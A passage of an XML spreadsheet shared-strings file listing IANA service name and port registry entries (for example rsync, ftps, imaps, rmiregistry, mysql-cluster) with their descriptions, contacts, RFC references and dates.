  <si>
    <t>TWAMP-Test Receiver Port</t>
  </si>
  <si>
    <t>863-872</t>
  </si>
  <si>
    <t>rsync</t>
  </si>
  <si>
    <t>[Andrew_Tridgell]</t>
  </si>
  <si>
    <t>874-885</t>
  </si>
  <si>
    <t>iclcnet-locate</t>
  </si>
  <si>
    <t>ICL coNETion locate server</t>
  </si>
  <si>
    <t>[Bob_Lyon]</t>
  </si>
  <si>
    <t>iclcnet-svinfo</t>
  </si>
  <si>
    <t>ICL coNETion server info
IANA assigned this well-formed service name as a replacement for "iclcnet_svinfo".</t>
  </si>
  <si>
    <t>iclcnet_svinfo</t>
  </si>
  <si>
    <t>ICL coNETion server info</t>
  </si>
  <si>
    <t>This entry is an alias to "iclcnet-svinfo".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>accessbuilder</t>
  </si>
  <si>
    <t>AccessBuilder</t>
  </si>
  <si>
    <t>[Steve_Sweeney]</t>
  </si>
  <si>
    <t>cddbp</t>
  </si>
  <si>
    <t>CD Database Protocol</t>
  </si>
  <si>
    <t>[Steve_Scherf]</t>
  </si>
  <si>
    <t>This entry records an unassigned but widespread use</t>
  </si>
  <si>
    <t>889-899</t>
  </si>
  <si>
    <t>omginitialrefs</t>
  </si>
  <si>
    <t>OMG Initial Refs</t>
  </si>
  <si>
    <t>[Christian_Callsen]</t>
  </si>
  <si>
    <t>smpnameres</t>
  </si>
  <si>
    <t>SMPNAMERES</t>
  </si>
  <si>
    <t>[Leif_Ekblad]</t>
  </si>
  <si>
    <t>ideafarm-door</t>
  </si>
  <si>
    <t>self documenting Telnet Door</t>
  </si>
  <si>
    <t>self documenting Door: send 0x00 for info</t>
  </si>
  <si>
    <t>ideafarm-panic</t>
  </si>
  <si>
    <t>self documenting Telnet Panic Door</t>
  </si>
  <si>
    <t>[Wo_o_Ideafarm]</t>
  </si>
  <si>
    <t>self documenting Panic Door: send 0x00 for info</t>
  </si>
  <si>
    <t>904-909</t>
  </si>
  <si>
    <t>kink</t>
  </si>
  <si>
    <t>Kerberized Internet Negotiation of Keys (KINK)</t>
  </si>
  <si>
    <t>[RFC4430]</t>
  </si>
  <si>
    <t>xact-backup</t>
  </si>
  <si>
    <t>[Bill_Carroll]</t>
  </si>
  <si>
    <t>apex-mesh</t>
  </si>
  <si>
    <t>APEX relay-relay service</t>
  </si>
  <si>
    <t>apex-edge</t>
  </si>
  <si>
    <t>APEX endpoint-relay service</t>
  </si>
  <si>
    <t>[RFC3340]</t>
  </si>
  <si>
    <t>914-952</t>
  </si>
  <si>
    <t>rndc</t>
  </si>
  <si>
    <t>BIND9 remote name daemon controller</t>
  </si>
  <si>
    <t>[Internet_Systems_Consortium_Inc]</t>
  </si>
  <si>
    <t>[Ray_Bellis]</t>
  </si>
  <si>
    <t>954-988</t>
  </si>
  <si>
    <t>ftps-data</t>
  </si>
  <si>
    <t>ftp protocol, data, over TLS/SSL</t>
  </si>
  <si>
    <t>ftps</t>
  </si>
  <si>
    <t>ftp protocol, control, over TLS/SSL</t>
  </si>
  <si>
    <t>[Christopher_Allen]</t>
  </si>
  <si>
    <t>nas</t>
  </si>
  <si>
    <t>Netnews Administration System</t>
  </si>
  <si>
    <t>[Vera_Heinau][Heiko_Schlichting]</t>
  </si>
  <si>
    <t>[RFC4707]</t>
  </si>
  <si>
    <t>telnets</t>
  </si>
  <si>
    <t>telnet protocol over TLS/SSL</t>
  </si>
  <si>
    <t>imaps</t>
  </si>
  <si>
    <t>IMAP over TLS protocol</t>
  </si>
  <si>
    <t>imap4 protocol over TLS/SSL</t>
  </si>
  <si>
    <t>(previous contact was[Christopher_Allen])</t>
  </si>
  <si>
    <t>pop3s</t>
  </si>
  <si>
    <t>POP3 over TLS protocol</t>
  </si>
  <si>
    <t>pop3 protocol over TLS/SSL (was spop3)</t>
  </si>
  <si>
    <t>[Gordon_Mangione]</t>
  </si>
  <si>
    <t>vsinet</t>
  </si>
  <si>
    <t>[Rob_Juergens]</t>
  </si>
  <si>
    <t>maitrd</t>
  </si>
  <si>
    <t>busboy</t>
  </si>
  <si>
    <t>puparp</t>
  </si>
  <si>
    <t>garcon</t>
  </si>
  <si>
    <t>applix</t>
  </si>
  <si>
    <t>Applix ac</t>
  </si>
  <si>
    <t>puprouter</t>
  </si>
  <si>
    <t>cadlock2</t>
  </si>
  <si>
    <t>webpush</t>
  </si>
  <si>
    <t>HTTP Web Push</t>
  </si>
  <si>
    <t>[RFC8030]</t>
  </si>
  <si>
    <t>1002-1007</t>
  </si>
  <si>
    <t>Possibly used by Sun Solaris????</t>
  </si>
  <si>
    <t>surf</t>
  </si>
  <si>
    <t>[Joseph_Geer]</t>
  </si>
  <si>
    <t>1011-1020</t>
  </si>
  <si>
    <t>exp1</t>
  </si>
  <si>
    <t>RFC3692-style Experiment 1</t>
  </si>
  <si>
    <t>[1][RFC4727][RFC6335]</t>
  </si>
  <si>
    <t>exp2</t>
  </si>
  <si>
    <t>RFC3692-style Experiment 2</t>
  </si>
  <si>
    <t>[IANA]</t>
  </si>
  <si>
    <t>blackjack</t>
  </si>
  <si>
    <t>network blackjack</t>
  </si>
  <si>
    <t>cap</t>
  </si>
  <si>
    <t>Calendar Access Protocol</t>
  </si>
  <si>
    <t>[Doug_Royer]</t>
  </si>
  <si>
    <t>6a44</t>
  </si>
  <si>
    <t>IPv6 Behind NAT44 CPEs</t>
  </si>
  <si>
    <t>[RFC6751]</t>
  </si>
  <si>
    <t>Deprecated</t>
  </si>
  <si>
    <t>2004-02</t>
  </si>
  <si>
    <t>solid-mux</t>
  </si>
  <si>
    <t>Solid Mux Server</t>
  </si>
  <si>
    <t>[Anders_Borg]</t>
  </si>
  <si>
    <t>2004-11</t>
  </si>
  <si>
    <t>netinfo-local</t>
  </si>
  <si>
    <t>local netinfo port</t>
  </si>
  <si>
    <t>[Marc_Majka]</t>
  </si>
  <si>
    <t>2002-08</t>
  </si>
  <si>
    <t>activesync</t>
  </si>
  <si>
    <t>ActiveSync Notifications</t>
  </si>
  <si>
    <t>[Sandra_Vargas]</t>
  </si>
  <si>
    <t>2003-03</t>
  </si>
  <si>
    <t>mxxrlogin</t>
  </si>
  <si>
    <t>MX-XR RPC</t>
  </si>
  <si>
    <t>[Valassis]</t>
  </si>
  <si>
    <t>[John_Eckert]</t>
  </si>
  <si>
    <t>2003-04</t>
  </si>
  <si>
    <t>nsstp</t>
  </si>
  <si>
    <t>Nebula Secure Segment Transfer Protocol</t>
  </si>
  <si>
    <t>[Steve_Ravida]</t>
  </si>
  <si>
    <t>ams</t>
  </si>
  <si>
    <t>AMS</t>
  </si>
  <si>
    <t>[Ronald_R_Ohmer]</t>
  </si>
  <si>
    <t>mtqp</t>
  </si>
  <si>
    <t>Message Tracking Query Protocol</t>
  </si>
  <si>
    <t>[RFC3887]</t>
  </si>
  <si>
    <t>sbl</t>
  </si>
  <si>
    <t>Streamlined Blackhole</t>
  </si>
  <si>
    <t>[Jonathan_A_Zdziaras]</t>
  </si>
  <si>
    <t>netarx</t>
  </si>
  <si>
    <t>Netarx Netcare</t>
  </si>
  <si>
    <t>[Sandy_Kronenberg]</t>
  </si>
  <si>
    <t>danf-ak2</t>
  </si>
  <si>
    <t>AK2 Product</t>
  </si>
  <si>
    <t>[Karl_Palsson]</t>
  </si>
  <si>
    <t>afrog</t>
  </si>
  <si>
    <t>Subnet Roaming</t>
  </si>
  <si>
    <t>[Michael_Chapman]</t>
  </si>
  <si>
    <t>boinc-client</t>
  </si>
  <si>
    <t>BOINC Client Control</t>
  </si>
  <si>
    <t>[David_Anderson]</t>
  </si>
  <si>
    <t>dcutility</t>
  </si>
  <si>
    <t>Dev Consortium Utility</t>
  </si>
  <si>
    <t>[Chris_Ryland]</t>
  </si>
  <si>
    <t>fpitp</t>
  </si>
  <si>
    <t>Fingerprint Image Transfer Protocol</t>
  </si>
  <si>
    <t>[Steven_Fields]</t>
  </si>
  <si>
    <t>2002-02</t>
  </si>
  <si>
    <t>wfremotertm</t>
  </si>
  <si>
    <t>WebFilter Remote Monitor</t>
  </si>
  <si>
    <t>[Tim_Morgan]</t>
  </si>
  <si>
    <t>neod1</t>
  </si>
  <si>
    <t>Sun's NEO Object Request Broker</t>
  </si>
  <si>
    <t>neod2</t>
  </si>
  <si>
    <t>[Rohit_Garg]</t>
  </si>
  <si>
    <t>td-postman</t>
  </si>
  <si>
    <t>Tobit David Postman VPMN</t>
  </si>
  <si>
    <t>cma</t>
  </si>
  <si>
    <t>CORBA Management Agent</t>
  </si>
  <si>
    <t>[Ramy_Zaarour]</t>
  </si>
  <si>
    <t>optima-vnet</t>
  </si>
  <si>
    <t>Optima VNET</t>
  </si>
  <si>
    <t>[Ralf_Doewich]</t>
  </si>
  <si>
    <t>ddt</t>
  </si>
  <si>
    <t>Dynamic DNS Tools</t>
  </si>
  <si>
    <t>[Remi_Lefebvre]</t>
  </si>
  <si>
    <t>remote-as</t>
  </si>
  <si>
    <t>Remote Assistant (RA)</t>
  </si>
  <si>
    <t>[Roman_Kriis]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 1053</t>
  </si>
  <si>
    <t>brvread</t>
  </si>
  <si>
    <t>BRVREAD</t>
  </si>
  <si>
    <t>[A_Boninn]</t>
  </si>
  <si>
    <t>ansyslmd</t>
  </si>
  <si>
    <t>ANSYS - License Manager</t>
  </si>
  <si>
    <t>[Suzanne_Lorrin]</t>
  </si>
  <si>
    <t>vfo</t>
  </si>
  <si>
    <t>VFO</t>
  </si>
  <si>
    <t>[Anthony_Gonzalez]</t>
  </si>
  <si>
    <t>startron</t>
  </si>
  <si>
    <t>STARTRON</t>
  </si>
  <si>
    <t>[Markus_Sabadello]</t>
  </si>
  <si>
    <t>nim</t>
  </si>
  <si>
    <t>nimreg</t>
  </si>
  <si>
    <t>[Robert_Gordon]</t>
  </si>
  <si>
    <t>polestar</t>
  </si>
  <si>
    <t>POLESTAR</t>
  </si>
  <si>
    <t>[Masakuni_Okada]</t>
  </si>
  <si>
    <t>kiosk</t>
  </si>
  <si>
    <t>KIOSK</t>
  </si>
  <si>
    <t>[Ken_Ksiazek]</t>
  </si>
  <si>
    <t>veracity</t>
  </si>
  <si>
    <t>Veracity</t>
  </si>
  <si>
    <t>[Ross_Williams]</t>
  </si>
  <si>
    <t>kyoceranetdev</t>
  </si>
  <si>
    <t>KyoceraNetDev</t>
  </si>
  <si>
    <t>[Shigenaka_Kanemitsu]</t>
  </si>
  <si>
    <t>jstel</t>
  </si>
  <si>
    <t>JSTEL</t>
  </si>
  <si>
    <t>[Duane_Kiser]</t>
  </si>
  <si>
    <t>syscomlan</t>
  </si>
  <si>
    <t>SYSCOMLAN</t>
  </si>
  <si>
    <t>[Alexandre_Lechenne]</t>
  </si>
  <si>
    <t>fpo-fns</t>
  </si>
  <si>
    <t>FPO-FNS</t>
  </si>
  <si>
    <t>[Jens_Klose]</t>
  </si>
  <si>
    <t>instl-boots</t>
  </si>
  <si>
    <t>Installation Bootstrap Proto. Serv.
IANA assigned this well-formed service name as a replacement for "instl_boots".</t>
  </si>
  <si>
    <t>instl_boots</t>
  </si>
  <si>
    <t>Installation Bootstrap Proto. Serv.</t>
  </si>
  <si>
    <t>This entry is an alias to "instl-boots".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>instl-bootc</t>
  </si>
  <si>
    <t>Installation Bootstrap Proto. Cli.
IANA assigned this well-formed service name as a replacement for "instl_bootc".</t>
  </si>
  <si>
    <t>[David_Arko]</t>
  </si>
  <si>
    <t>instl_bootc</t>
  </si>
  <si>
    <t>Installation Bootstrap Proto. Cli.</t>
  </si>
  <si>
    <t>This entry is an alias to "instl-bootc".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>cognex-insight</t>
  </si>
  <si>
    <t>COGNEX-INSIGHT</t>
  </si>
  <si>
    <t>[Steve_Olson]</t>
  </si>
  <si>
    <t>gmrupdateserv</t>
  </si>
  <si>
    <t>GMRUpdateSERV</t>
  </si>
  <si>
    <t>[Steve_Kellogg]</t>
  </si>
  <si>
    <t>bsquare-voip</t>
  </si>
  <si>
    <t>BSQUARE-VOIP</t>
  </si>
  <si>
    <t>[Yen_Lee]</t>
  </si>
  <si>
    <t>cardax</t>
  </si>
  <si>
    <t>CARDAX</t>
  </si>
  <si>
    <t>[Charles_Oram]</t>
  </si>
  <si>
    <t>bridgecontrol</t>
  </si>
  <si>
    <t>Bridge Control</t>
  </si>
  <si>
    <t>[Andy_Heron]</t>
  </si>
  <si>
    <t>warmspotMgmt</t>
  </si>
  <si>
    <t>Warmspot Management Protocol</t>
  </si>
  <si>
    <t>[Robert_C_Henningsga]</t>
  </si>
  <si>
    <t>rdrmshc</t>
  </si>
  <si>
    <t>RDRMSHC</t>
  </si>
  <si>
    <t>[Ericko_Shimada]</t>
  </si>
  <si>
    <t>dab-sti-c</t>
  </si>
  <si>
    <t>DAB STI-C</t>
  </si>
  <si>
    <t>[World_DAB]</t>
  </si>
  <si>
    <t>imgames</t>
  </si>
  <si>
    <t>IMGames</t>
  </si>
  <si>
    <t>[Jean_A_Ames]</t>
  </si>
  <si>
    <t>avocent-proxy</t>
  </si>
  <si>
    <t>Avocent Proxy Protocol</t>
  </si>
  <si>
    <t>[Steven_W_Clark]</t>
  </si>
  <si>
    <t>asprovatalk</t>
  </si>
  <si>
    <t>ASPROVATalk</t>
  </si>
  <si>
    <t>[Chiew_Farn_Chung]</t>
  </si>
  <si>
    <t>socks</t>
  </si>
  <si>
    <t>Socks</t>
  </si>
  <si>
    <t>[Ying_Da_Lee]</t>
  </si>
  <si>
    <t>pvuniwien</t>
  </si>
  <si>
    <t>PVUNIWIEN</t>
  </si>
  <si>
    <t>[Peter_Lipp]</t>
  </si>
  <si>
    <t>amt-esd-prot</t>
  </si>
  <si>
    <t>AMT-ESD-PROT</t>
  </si>
  <si>
    <t>[AMTEC_S_p_A]</t>
  </si>
  <si>
    <t>ansoft-lm-1</t>
  </si>
  <si>
    <t>Anasoft License Manager</t>
  </si>
  <si>
    <t>ansoft-lm-2</t>
  </si>
  <si>
    <t>webobjects</t>
  </si>
  <si>
    <t>Web Objects</t>
  </si>
  <si>
    <t>[Andy_Belk]</t>
  </si>
  <si>
    <t>cplscrambler-lg</t>
  </si>
  <si>
    <t>CPL Scrambler Logging</t>
  </si>
  <si>
    <t>cplscrambler-in</t>
  </si>
  <si>
    <t>CPL Scrambler Internal</t>
  </si>
  <si>
    <t>cplscrambler-al</t>
  </si>
  <si>
    <t>CPL Scrambler Alarm Log</t>
  </si>
  <si>
    <t>[Richard_Corn]</t>
  </si>
  <si>
    <t>ff-annunc</t>
  </si>
  <si>
    <t>FF Annunciation</t>
  </si>
  <si>
    <t>ff-fms</t>
  </si>
  <si>
    <t>FF Fieldbus Message Specification</t>
  </si>
  <si>
    <t>ff-sm</t>
  </si>
  <si>
    <t>FF System Management</t>
  </si>
  <si>
    <t>[Fieldbus_Foundation]</t>
  </si>
  <si>
    <t>obrpd</t>
  </si>
  <si>
    <t>Open Business Reporting Protocol</t>
  </si>
  <si>
    <t>[William_Randolph_Roy]</t>
  </si>
  <si>
    <t>proofd</t>
  </si>
  <si>
    <t>PROOFD</t>
  </si>
  <si>
    <t>rootd</t>
  </si>
  <si>
    <t>ROOTD</t>
  </si>
  <si>
    <t>[Fons_Rademakers]</t>
  </si>
  <si>
    <t>nicelink</t>
  </si>
  <si>
    <t>NICELink</t>
  </si>
  <si>
    <t>[Jordi_Lisbona]</t>
  </si>
  <si>
    <t>cnrprotocol</t>
  </si>
  <si>
    <t>Common Name Resolution Protocol</t>
  </si>
  <si>
    <t>[Michael_Mealling]</t>
  </si>
  <si>
    <t>sunclustermgr</t>
  </si>
  <si>
    <t>Sun Cluster Manager</t>
  </si>
  <si>
    <t>[Ashit_Patel]</t>
  </si>
  <si>
    <t>rmiactivation</t>
  </si>
  <si>
    <t>RMI Activation</t>
  </si>
  <si>
    <t>rmiregistry</t>
  </si>
  <si>
    <t>RMI Registry</t>
  </si>
  <si>
    <t>[Mark_Hodapp]</t>
  </si>
  <si>
    <t>mctp</t>
  </si>
  <si>
    <t>MCTP</t>
  </si>
  <si>
    <t>[Vitaly_Revsin]</t>
  </si>
  <si>
    <t>pt2-discover</t>
  </si>
  <si>
    <t>PT2-DISCOVER</t>
  </si>
  <si>
    <t>[Ralph_Kammerlander]</t>
  </si>
  <si>
    <t>adobeserver-1</t>
  </si>
  <si>
    <t>ADOBE SERVER 1</t>
  </si>
  <si>
    <t>adobeserver-2</t>
  </si>
  <si>
    <t>ADOBE SERVER 2</t>
  </si>
  <si>
    <t>[Frank_Soetebeer]</t>
  </si>
  <si>
    <t>xrl</t>
  </si>
  <si>
    <t>XRL</t>
  </si>
  <si>
    <t>[Patrick_Robinson]</t>
  </si>
  <si>
    <t>ftranhc</t>
  </si>
  <si>
    <t>FTRANHC</t>
  </si>
  <si>
    <t>[Eriko_Shimada]</t>
  </si>
  <si>
    <t>isoipsigport-1</t>
  </si>
  <si>
    <t>ISOIPSIGPORT-1</t>
  </si>
  <si>
    <t>isoipsigport-2</t>
  </si>
  <si>
    <t>ISOIPSIGPORT-2</t>
  </si>
  <si>
    <t>[Peter_Egli]</t>
  </si>
  <si>
    <t>ratio-adp</t>
  </si>
  <si>
    <t>[Oliver_Thulke]</t>
  </si>
  <si>
    <t>Reserved - IANA</t>
  </si>
  <si>
    <t>webadmstart</t>
  </si>
  <si>
    <t>Start web admin server</t>
  </si>
  <si>
    <t>nfsd-keepalive</t>
  </si>
  <si>
    <t>Client status info</t>
  </si>
  <si>
    <t>[Beth_Crespo]</t>
  </si>
  <si>
    <t>lmsocialserver</t>
  </si>
  <si>
    <t>LM Social Server</t>
  </si>
  <si>
    <t>[Ron_Lussier]</t>
  </si>
  <si>
    <t>icp</t>
  </si>
  <si>
    <t>Intelligent Communication Protocol</t>
  </si>
  <si>
    <t>[Mark_H_David]</t>
  </si>
  <si>
    <t>ltp-deepspace</t>
  </si>
  <si>
    <t>Licklider Transmission Protocol</t>
  </si>
  <si>
    <t>[RFC5326]</t>
  </si>
  <si>
    <t>[RFC5326][RFC7122]</t>
  </si>
  <si>
    <t>[RFC7122]</t>
  </si>
  <si>
    <t>mini-sql</t>
  </si>
  <si>
    <t>Mini SQL</t>
  </si>
  <si>
    <t>[David_Hughes]</t>
  </si>
  <si>
    <t>ardus-trns</t>
  </si>
  <si>
    <t>ARDUS Transfer</t>
  </si>
  <si>
    <t>ardus-cntl</t>
  </si>
  <si>
    <t>ARDUS Control</t>
  </si>
  <si>
    <t>ardus-mtrns</t>
  </si>
  <si>
    <t>ARDUS Multicast Transfer</t>
  </si>
  <si>
    <t>[Shinya_Abe]</t>
  </si>
  <si>
    <t>sacred</t>
  </si>
  <si>
    <t>SACRED</t>
  </si>
  <si>
    <t>[RFC3767]</t>
  </si>
  <si>
    <t>bnetgame</t>
  </si>
  <si>
    <t>Battle.net Chat/Game Protocol</t>
  </si>
  <si>
    <t>bnetfile</t>
  </si>
  <si>
    <t>Battle.net File Transfer Protocol</t>
  </si>
  <si>
    <t>[Domain_Tech]</t>
  </si>
  <si>
    <t>2005-04</t>
  </si>
  <si>
    <t>rmpp</t>
  </si>
  <si>
    <t>Datalode RMPP</t>
  </si>
  <si>
    <t>[Dave_Ruedger]</t>
  </si>
  <si>
    <t>2003-11</t>
  </si>
  <si>
    <t>availant-mgr</t>
  </si>
  <si>
    <t>[Steven_Pelletier]</t>
  </si>
  <si>
    <t>murray</t>
  </si>
  <si>
    <t>Murray</t>
  </si>
  <si>
    <t>[Stu_Mark]</t>
  </si>
  <si>
    <t>hpvmmcontrol</t>
  </si>
  <si>
    <t>HP VMM Control</t>
  </si>
  <si>
    <t>hpvmmagent</t>
  </si>
  <si>
    <t>HP VMM Agent</t>
  </si>
  <si>
    <t>hpvmmdata</t>
  </si>
  <si>
    <t>[John_Morton]</t>
  </si>
  <si>
    <t>kwdb-commn</t>
  </si>
  <si>
    <t>KWDB Remote Communication</t>
  </si>
  <si>
    <t>[Lal_Samuel_Varghese]</t>
  </si>
  <si>
    <t>2005-08</t>
  </si>
  <si>
    <t>saphostctrl</t>
  </si>
  <si>
    <t>SAPHostControl over SOAP/HTTP</t>
  </si>
  <si>
    <t>saphostctrls</t>
  </si>
  <si>
    <t>SAPHostControl over SOAP/HTTPS</t>
  </si>
  <si>
    <t>[Muscarella_Fabrizio]</t>
  </si>
  <si>
    <t>2006-04</t>
  </si>
  <si>
    <t>casp</t>
  </si>
  <si>
    <t>CAC App Service Protocol</t>
  </si>
  <si>
    <t>caspssl</t>
  </si>
  <si>
    <t>CAC App Service Protocol Encripted</t>
  </si>
  <si>
    <t>[Enrique_Corujo]</t>
  </si>
  <si>
    <t>2006-02</t>
  </si>
  <si>
    <t>kvm-via-ip</t>
  </si>
  <si>
    <t>KVM-via-IP Management Service</t>
  </si>
  <si>
    <t>[Ian_Miller]</t>
  </si>
  <si>
    <t>2006-03</t>
  </si>
  <si>
    <t>dfn</t>
  </si>
  <si>
    <t>Data Flow Network</t>
  </si>
  <si>
    <t>[Dmitry_Obuvalin]</t>
  </si>
  <si>
    <t>aplx</t>
  </si>
  <si>
    <t>MicroAPL APLX</t>
  </si>
  <si>
    <t>[Richard_Nabavi]</t>
  </si>
  <si>
    <t>omnivision</t>
  </si>
  <si>
    <t>OmniVision Communication Service</t>
  </si>
  <si>
    <t>[Serge_Vacquier]</t>
  </si>
  <si>
    <t>hhb-gateway</t>
  </si>
  <si>
    <t>HHB Gateway Control</t>
  </si>
  <si>
    <t>[Richard_Harwell]</t>
  </si>
  <si>
    <t>trim</t>
  </si>
  <si>
    <t>TRIM Workgroup Service</t>
  </si>
  <si>
    <t>[Siva_Poobalasingam]</t>
  </si>
  <si>
    <t>encrypted-admin</t>
  </si>
  <si>
    <t>encrypted admin requests
IANA assigned this well-formed service name as a replacement for "encrypted_admin".</t>
  </si>
  <si>
    <t>[Michael_Elizarov]</t>
  </si>
  <si>
    <t>2007-01</t>
  </si>
  <si>
    <t>encrypted_admin</t>
  </si>
  <si>
    <t>encrypted admin requests</t>
  </si>
  <si>
    <t>This entry is an alias to "encrypted-admin".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>evm</t>
  </si>
  <si>
    <t>Enterprise Virtual Manager</t>
  </si>
  <si>
    <t>[Thomas_Hennessy]</t>
  </si>
  <si>
    <t>autonoc</t>
  </si>
  <si>
    <t>AutoNOC Network Operations Protocol</t>
  </si>
  <si>
    <t>[Kyle_Lussier]</t>
  </si>
  <si>
    <t>2005-12</t>
  </si>
  <si>
    <t>mxomss</t>
  </si>
  <si>
    <t>User Message Service</t>
  </si>
  <si>
    <t>[Chaoyi_Lang]</t>
  </si>
  <si>
    <t>2006-01</t>
  </si>
  <si>
    <t>edtools</t>
  </si>
  <si>
    <t>User Discovery Service</t>
  </si>
  <si>
    <t>[Lee_Dolson]</t>
  </si>
  <si>
    <t>imyx</t>
  </si>
  <si>
    <t>Infomatryx Exchange</t>
  </si>
  <si>
    <t>[David_Walling]</t>
  </si>
  <si>
    <t>fuscript</t>
  </si>
  <si>
    <t>Fusion Script</t>
  </si>
  <si>
    <t>[Peter_Loveday]</t>
  </si>
  <si>
    <t>x9-icue</t>
  </si>
  <si>
    <t>X9 iCue Show Control</t>
  </si>
  <si>
    <t>[Brandon_Potter]</t>
  </si>
  <si>
    <t>audit-transfer</t>
  </si>
  <si>
    <t>audit transfer</t>
  </si>
  <si>
    <t>[Mark_Wahl]</t>
  </si>
  <si>
    <t>2005-11</t>
  </si>
  <si>
    <t>capioverlan</t>
  </si>
  <si>
    <t>CAPIoverLAN</t>
  </si>
  <si>
    <t>[Diego_Friedel]</t>
  </si>
  <si>
    <t>elfiq-repl</t>
  </si>
  <si>
    <t>Elfiq Replication Service</t>
  </si>
  <si>
    <t>[Frederick_Parent]</t>
  </si>
  <si>
    <t>bvtsonar</t>
  </si>
  <si>
    <t>BlueView Sonar Service</t>
  </si>
  <si>
    <t>[Teledyne_BlueView_Inc]</t>
  </si>
  <si>
    <t>[Cat_Zimmermann]</t>
  </si>
  <si>
    <t>blaze</t>
  </si>
  <si>
    <t>Blaze File Server</t>
  </si>
  <si>
    <t>[Curt_Schimmel]</t>
  </si>
  <si>
    <t>unizensus</t>
  </si>
  <si>
    <t>Unizensus Login Server</t>
  </si>
  <si>
    <t>[Dirk_Materlik]</t>
  </si>
  <si>
    <t>winpoplanmess</t>
  </si>
  <si>
    <t>Winpopup LAN Messenger</t>
  </si>
  <si>
    <t>[Vitali_Fomine]</t>
  </si>
  <si>
    <t>c1222-acse</t>
  </si>
  <si>
    <t>ANSI C12.22 Port</t>
  </si>
  <si>
    <t>[RFC6142]</t>
  </si>
  <si>
    <t>resacommunity</t>
  </si>
  <si>
    <t>Community Service</t>
  </si>
  <si>
    <t>[Stephane_MONS]</t>
  </si>
  <si>
    <t>2005-09</t>
  </si>
  <si>
    <t>nfa</t>
  </si>
  <si>
    <t>Network File Access</t>
  </si>
  <si>
    <t>[James_Powell]</t>
  </si>
  <si>
    <t>iascontrol-oms</t>
  </si>
  <si>
    <t>iasControl OMS</t>
  </si>
  <si>
    <t>[Todd_Guay]</t>
  </si>
  <si>
    <t>iascontrol</t>
  </si>
  <si>
    <t>Oracle iASControl</t>
  </si>
  <si>
    <t>dbcontrol-oms</t>
  </si>
  <si>
    <t>dbControl OMS</t>
  </si>
  <si>
    <t>oracle-oms</t>
  </si>
  <si>
    <t>Oracle OMS</t>
  </si>
  <si>
    <t>olsv</t>
  </si>
  <si>
    <t>DB Lite Mult-User Server</t>
  </si>
  <si>
    <t>[Philip_Stephenson]</t>
  </si>
  <si>
    <t>health-polling</t>
  </si>
  <si>
    <t>Health Polling</t>
  </si>
  <si>
    <t>health-trap</t>
  </si>
  <si>
    <t>Health Trap</t>
  </si>
  <si>
    <t>sddp</t>
  </si>
  <si>
    <t>SmartDialer Data Protocol</t>
  </si>
  <si>
    <t>[Lee_Griffiths]</t>
  </si>
  <si>
    <t>qsm-proxy</t>
  </si>
  <si>
    <t>QSM Proxy Service</t>
  </si>
  <si>
    <t>[Norm_Lunde]</t>
  </si>
  <si>
    <t>qsm-gui</t>
  </si>
  <si>
    <t>QSM GUI Service</t>
  </si>
  <si>
    <t>qsm-remote</t>
  </si>
  <si>
    <t>QSM RemoteExec</t>
  </si>
  <si>
    <t>cisco-ipsla</t>
  </si>
  <si>
    <t>Cisco IP SLAs Control Protocol</t>
  </si>
  <si>
    <t>[Emmanuel_Tychon]</t>
  </si>
  <si>
    <t>vchat</t>
  </si>
  <si>
    <t>VChat Conference Service</t>
  </si>
  <si>
    <t>[Andreas_Wetzel]</t>
  </si>
  <si>
    <t>2002-09</t>
  </si>
  <si>
    <t>tripwire</t>
  </si>
  <si>
    <t>TRIPWIRE</t>
  </si>
  <si>
    <t>[Ed_Metcalf][Albert_Holt]</t>
  </si>
  <si>
    <t>atc-lm</t>
  </si>
  <si>
    <t>AT+C License Manager</t>
  </si>
  <si>
    <t>[Peter_Schafer]</t>
  </si>
  <si>
    <t>atc-appserver</t>
  </si>
  <si>
    <t>AT+C FmiApplicationServer</t>
  </si>
  <si>
    <t>dnap</t>
  </si>
  <si>
    <t>DNA Protocol</t>
  </si>
  <si>
    <t>[David_McLaughlin]</t>
  </si>
  <si>
    <t>d-cinema-rrp</t>
  </si>
  <si>
    <t>D-Cinema Request-Response</t>
  </si>
  <si>
    <t>[Robert_Baldwin]</t>
  </si>
  <si>
    <t>fnet-remote-ui</t>
  </si>
  <si>
    <t>FlashNet Remote Admin</t>
  </si>
  <si>
    <t>[Terry_Smyth]</t>
  </si>
  <si>
    <t>dossier</t>
  </si>
  <si>
    <t>Dossier Server</t>
  </si>
  <si>
    <t>[Rob_Minerick]</t>
  </si>
  <si>
    <t>indigo-server</t>
  </si>
  <si>
    <t>Indigo Home Server</t>
  </si>
  <si>
    <t>[Matt_Bendiksen]</t>
  </si>
  <si>
    <t>dkmessenger</t>
  </si>
  <si>
    <t>DKMessenger Protocol</t>
  </si>
  <si>
    <t>[Douglas_Kadlecek]</t>
  </si>
  <si>
    <t>sgi-storman</t>
  </si>
  <si>
    <t>SGI Storage Manager</t>
  </si>
  <si>
    <t>[Greg_Banks]</t>
  </si>
  <si>
    <t>b2n</t>
  </si>
  <si>
    <t>Backup To Neighbor</t>
  </si>
  <si>
    <t>[Thomas_Fok]</t>
  </si>
  <si>
    <t>mc-client</t>
  </si>
  <si>
    <t>Millicent Client Proxy</t>
  </si>
  <si>
    <t>[Steve_Glassman]</t>
  </si>
  <si>
    <t>3comnetman</t>
  </si>
  <si>
    <t>3Com Net Management</t>
  </si>
  <si>
    <t>[Peter_White]</t>
  </si>
  <si>
    <t>accelenet</t>
  </si>
  <si>
    <t>AcceleNet Control</t>
  </si>
  <si>
    <t>accelenet-data</t>
  </si>
  <si>
    <t>AcceleNet Data</t>
  </si>
  <si>
    <t>[Peter_Lepeska]</t>
  </si>
  <si>
    <t>llsurfup-http</t>
  </si>
  <si>
    <t>LL Surfup HTTP</t>
  </si>
  <si>
    <t>llsurfup-https</t>
  </si>
  <si>
    <t>LL Surfup HTTPS</t>
  </si>
  <si>
    <t>[Katy_Lynn_McCullough]</t>
  </si>
  <si>
    <t>catchpole</t>
  </si>
  <si>
    <t>Catchpole port</t>
  </si>
  <si>
    <t>[Christian_Catchpole]</t>
  </si>
  <si>
    <t>2002-03</t>
  </si>
  <si>
    <t>mysql-cluster</t>
  </si>
  <si>
    <t>MySQL Cluster Manager</t>
  </si>
  <si>
    <t>[Arjen_Lentz]</t>
  </si>
  <si>
